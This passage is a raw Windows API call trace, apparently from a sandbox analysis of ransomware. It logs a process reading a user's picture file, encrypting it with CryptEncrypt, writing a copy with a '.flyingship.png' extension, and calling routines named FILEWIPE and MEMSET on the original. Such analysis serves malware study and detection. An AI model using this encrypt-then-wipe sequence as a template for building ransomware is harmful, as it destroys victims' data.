Flags=0x0, Size=0x10) returned 0x9ba2e8 [0189.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0189.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0189.276] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.flyingship.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\evgfmja.flyingship.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0189.277] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.277] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0189.277] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.277] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.278] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0189.278] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0xa1fa, lpOverlapped=0x0) returned 1 [0189.280] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0189.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0189.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0189.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0189.281] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.281] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.281] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.281] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0189.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0189.282] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.282] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.282] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0189.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0189.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0189.282] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0189.282] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0189.282] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0189.282] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0189.282] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0189.282] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0189.282] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.282] CryptGetKeyParam (in: hKey=0x90aed8, dwParam=0x7, pbData=0x9c26a8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c26a8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0189.282] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0189.282] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0189.283] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.283] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.283] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.283] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0189.283] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.283] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.283] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0189.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def60 | out: hHeap=0x8a0000) returned 1 [0189.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0189.283] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.284] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0189.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0189.284] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0189.284] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0189.284] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.284] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0189.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0189.284] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0189.284] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0189.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0189.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0189.299] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0189.301] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.301] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0xa1fa, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0xa200) returned 1 [0189.301] CharLowerBuffW (in: lpsz="byte[41473]", cchLength=0xb | out: lpsz="byte[41473]") returned 0xb [0189.303] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0189.303] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.304] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa5f008*, pdwDataLen=0x87e820*=0xa1fa, dwBufLen=0xa200 | out: pbData=0xa5f008*, pdwDataLen=0x87e820*=0xa200) returned 1 [0189.306] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0189.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0189.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0189.306] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0189.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0189.306] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0189.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0189.316] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0189.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0189.317] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0189.317] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.317] CryptDestroyKey (hKey=0x90aed8) returned 1 [0189.317] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0189.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0189.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0189.317] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0189.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0189.318] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0189.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0189.318] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0189.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0189.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0189.318] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0189.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0189.318] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0189.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0189.318] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0189.318] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0189.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0189.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0189.318] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.318] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0189.318] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0189.319] FreeLibrary (hLibModule=0x74f20000) returned 1 [0189.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0189.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0189.347] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0189.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0189.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0189.348] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.png", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc05e48a0, ftCreationTime.dwHighDateTime=0x1d5dfa5, ftLastAccessTime.dwLowDateTime=0x283be5b0, ftLastAccessTime.dwHighDateTime=0x1d5dc0c, ftLastWriteTime.dwLowDateTime=0x283be5b0, ftLastWriteTime.dwHighDateTime=0x1d5dc0c, nFileSizeHigh=0x0, nFileSizeLow=0xa1fa, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="EVGfmjA.png", cAlternateFileName="")) returned 0x90af58 [0189.348] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0189.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0189.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0189.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0189.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0189.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0189.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0189.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0189.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0189.348] CharLowerBuffW (in: lpsz="byte[41466]", cchLength=0xb | out: lpsz="byte[41466]") returned 0xb [0189.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0189.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0189.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0189.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0189.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0189.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0189.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0189.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0189.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0189.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0189.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0189.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0189.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0189.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0189.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0189.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0189.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa1fa) returned 0xbca008 [0189.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0189.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0189.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0189.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0189.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0189.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0189.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0189.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0189.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0189.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0189.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0189.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0189.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0189.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc198 [0189.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0189.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0189.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0189.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0189.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0189.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0189.350] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0189.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0189.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0189.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0189.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b30 [0189.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0189.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0189.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0189.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0189.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0189.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0189.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0189.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0189.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0189.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0189.351] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0189.351] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0189.351] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0189.351] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0189.351] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0189.351] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0189.351] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0189.351] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0189.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18b0 [0189.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0189.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0189.351] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0189.351] RtlAllocateHeap 